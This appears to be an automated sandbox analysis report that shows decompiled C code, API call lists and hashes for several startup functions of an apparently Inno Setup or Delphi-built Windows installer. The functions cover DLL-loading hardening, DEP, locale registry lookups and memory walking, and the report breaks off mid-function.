                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}





























                                                                    0x004b5115
                                                                    0x004b5117
                                                                    0x004b511c
                                                                    0x004b511c
                                                                    0x004b511e
                                                                    0x004b5120
                                                                    0x004b5120
                                                                    0x004b5128
                                                                    0x004b5129
                                                                    0x004b512e
                                                                    0x004b5131
                                                                    0x004b5134
                                                                    0x004b513b
                                                                    0x004b536d
                                                                    0x004b536f
                                                                    0x004b5372
                                                                    0x004b5375
                                                                    0x004b5387
                                                                    0x004b5141
                                                                    0x004b514b
                                                                    0x004b514d
                                                                    0x004b5154
                                                                    0x004b515a
                                                                    0x004b5167
                                                                    0x004b516b
                                                                    0x004b5172
                                                                    0x004b5177
                                                                    0x004b5179
                                                                    0x004b5179
                                                                    0x004b516b
                                                                    0x004b517c
                                                                    0x004b5188
                                                                    0x004b518f
                                                                    0x004b5196
                                                                    0x004b5196
                                                                    0x004b519b
                                                                    0x004b51a8
                                                                    0x004b51b4
                                                                    0x004b51ba
                                                                    0x004b51c1
                                                                    0x004b51c6
                                                                    0x004b51c6
                                                                    0x004b51d4
                                                                    0x004b51e0
                                                                    0x004b51e0
                                                                    0x004b51f3
                                                                    0x004b51fb
                                                                    0x004b520e
                                                                    0x004b5216
                                                                    0x004b5229
                                                                    0x004b5231
                                                                    0x004b5244
                                                                    0x004b524c
                                                                    0x004b525f
                                                                    0x004b5267
                                                                    0x004b527a
                                                                    0x004b5282
                                                                    0x004b5295
                                                                    0x004b529d
                                                                    0x004b52b0
                                                                    0x004b52b8
                                                                    0x004b52cb
                                                                    0x004b52d3
                                                                    0x004b52e6
                                                                    0x004b52ee
                                                                    0x004b5301
                                                                    0x004b5309
                                                                    0x004b531c
                                                                    0x004b5324
                                                                    0x004b5337
                                                                    0x004b533f
                                                                    0x004b533f
                                                                    0x004b51b4
                                                                    0x004b534a
                                                                    0x004b5351
                                                                    0x004b5358
                                                                    0x004b5358
                                                                    0x004b5360
                                                                    0x004b5367
                                                                    0x004b536b
                                                                    0x004b536b
                                                                    0x00000000
                                                                    0x004b5367

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                                    • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                                      • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                                      • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                                    • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                                    • API String ID: 2248137261-3182217745
                                                                    • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                    • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                                    • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                    • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}













                                                                    0x004af920
                                                                    0x004af923
                                                                    0x004af926
                                                                    0x004af92f
                                                                    0x004af93b
                                                                    0x004af942
                                                                    0x004af9ee
                                                                    0x004af9ee
                                                                    0x004af948
                                                                    0x004af9db
                                                                    0x004af9db
                                                                    0x004af9e1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af954
                                                                    0x004af9c7
                                                                    0x004af9d2
                                                                    0x004af9d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af95c
                                                                    0x004af95c
                                                                    0x004af961
                                                                    0x004af967
                                                                    0x004af986
                                                                    0x004af98d
                                                                    0x004af98f
                                                                    0x004af98f
                                                                    0x004af98d
                                                                    0x004af994
                                                                    0x004af9a5
                                                                    0x004af99c
                                                                    0x004af9a1
                                                                    0x004af9a1
                                                                    0x004af9af
                                                                    0x004af9c2
                                                                    0x004af9c2
                                                                    0x00000000
                                                                    0x004af9af
                                                                    0x004af954
                                                                    0x00000000
                                                                    0x004af9db

                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                                    • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                                    • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Virtual$ProtectQuery$InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 2441996862-0
                                                                    • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                    • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                                    • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                    • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}













                                                                    0x0040b04a
                                                                    0x0040b04d
                                                                    0x0040b050
                                                                    0x0040b053
                                                                    0x0040b055
                                                                    0x0040b05b
                                                                    0x0040b062
                                                                    0x0040b063
                                                                    0x0040b068
                                                                    0x0040b06b
                                                                    0x0040b070
                                                                    0x0040b076
                                                                    0x0040b07f
                                                                    0x0040b08f
                                                                    0x0040b09c
                                                                    0x0040b0a3
                                                                    0x0040b0aa
                                                                    0x0040b0ac
                                                                    0x0040b0bd
                                                                    0x0040b0ca
                                                                    0x0040b0d1
                                                                    0x0040b0d8
                                                                    0x0040b0dc
                                                                    0x0040b0dc
                                                                    0x0040b0d8
                                                                    0x0040b0e3
                                                                    0x0040b0e6
                                                                    0x0040b0e9
                                                                    0x0040b0f6
                                                                    0x0040b103

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                                      • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                      • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                    • String ID:
                                                                    • API String ID: 3216391948-0
                                                                    • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                    • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                                    • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                    • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 46%
                                                                    			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}








                                                                    0x0040aefd
                                                                    0x0040aefe
                                                                    0x0040af04
                                                                    0x0040af0b
                                                                    0x0040af0c
                                                                    0x0040af11
                                                                    0x0040af14
                                                                    0x0040af27
                                                                    0x0040af34
                                                                    0x0040af37
                                                                    0x0040af37
                                                                    0x0040af3e
                                                                    0x0040af41
                                                                    0x0040af44
                                                                    0x0040af51

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                    • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                                    • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                    • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                                    0x0040ab19
                                                                    0x0040ab1b
                                                                    0x0040ab22
                                                                    0x0040ab24
                                                                    0x0040ab2a
                                                                    0x0040ab31
                                                                    0x0040ab32
                                                                    0x0040ab37
                                                                    0x0040ab3a
                                                                    0x0040ab41
                                                                    0x0040ab6d
                                                                    0x0040ab43
                                                                    0x0040ab51
                                                                    0x0040ab51
                                                                    0x0040ab7a
                                                                    0x0040ad27
                                                                    0x0040ad29
                                                                    0x0040ad2c
                                                                    0x0040ad2f
                                                                    0x0040ad3c
                                                                    0x0040ab80
                                                                    0x0040ab82
                                                                    0x0040ab9a
                                                                    0x0040aba1
                                                                    0x0040ac41
                                                                    0x0040ac43
                                                                    0x0040ac44
                                                                    0x0040ac49
                                                                    0x0040ac4c
                                                                    0x0040ac5a
                                                                    0x0040ac7b
                                                                    0x0040acca
                                                                    0x0040acd4
                                                                    0x0040acec
                                                                    0x0040acf6
                                                                    0x0040acf6
                                                                    0x0040ac7d
                                                                    0x0040ac85
                                                                    0x0040ac9f
                                                                    0x0040aca9
                                                                    0x0040aca9
                                                                    0x0040acfd
                                                                    0x0040ad00
                                                                    0x0040ad03
                                                                    0x0040ad0c
                                                                    0x0040ad11
                                                                    0x0040ad11
                                                                    0x0040ad1f
                                                                    0x0040aba7
                                                                    0x0040abbc
                                                                    0x0040abc3
                                                                    0x00000000
                                                                    0x0040abc5
                                                                    0x0040abda
                                                                    0x0040abe1
                                                                    0x00000000
                                                                    0x0040abe3
                                                                    0x0040abf8
                                                                    0x0040abff
                                                                    0x00000000
                                                                    0x0040ac01
                                                                    0x0040ac16
                                                                    0x0040ac1d
                                                                    0x00000000
                                                                    0x0040ac1f
                                                                    0x0040ac34
                                                                    0x0040ac3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040ac3b
                                                                    0x0040ac1d
                                                                    0x0040abff
                                                                    0x0040abe1
                                                                    0x0040abc3
                                                                    0x0040aba1

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                                    • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                    • API String ID: 2701450724-3496071916
                                                                    • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                    • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                                    • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                    • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B63A1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x202b4
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x202b4
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4f677c
				_t4 = _t26 + 0x20; // 0x4c529c
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4f677c
				_t7 = _t28 + 0x24; // 0xea800
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
